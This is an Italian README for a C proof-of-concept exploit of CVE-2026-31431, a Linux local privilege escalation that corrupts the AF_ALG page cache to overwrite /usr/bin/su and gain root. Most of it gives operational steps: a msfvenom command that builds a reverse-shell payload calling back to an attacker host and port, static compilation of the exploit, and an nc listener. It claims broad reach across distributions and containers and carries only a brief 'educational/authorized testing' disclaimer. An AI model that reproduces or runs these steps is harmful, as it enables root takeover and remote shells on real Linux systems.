
PoC in C per CVE-2026-31431, una LPE Linux non privilegiata che sfrutta la corruzione della page cache di AF_ALG per sovrascrivere /usr/bin/su e ottenere i privilegi di root.
LPE banale senza privilegi scrivendo 4 byte controllati nella page cache di qualsiasi file leggibile tramite un bug logico in AF_ALG (kernel 4.14 → inizio 2026).
Corrompi /usr/bin/su in memoria, poi eseguilo → root.

# 1. Genera un payload ELF (esempio di reverse shell)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86
# 2. Compila (statico, strippato, payload incorporato tramite .incbin)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c
# 3. Avvia prima il listener (nc -lvp <LPORT>), poi esegui l'exploit sull'host di destinazione
./copy_fail_x86
• CVE: CVE-2026-31431 • CVSS: 7.8 • Fix: commit a664bf3d603d
• Funziona su praticamente tutte le distribuzioni Linux 2017–2026 (contenitori inclusi).
• Tecnica: apre /usr/bin/su con O_RDONLY, abusa della decrittazione AEAD in-place per inserire un payload costruito ad hoc direttamente nella page cache, bypassando il VFS.
• Divulgazione originale e PoC Python da 732 byte → https://copy.fail
MIT – vedi LICENSE. Solo per uso didattico/test autorizzati. Usalo a tuo rischio.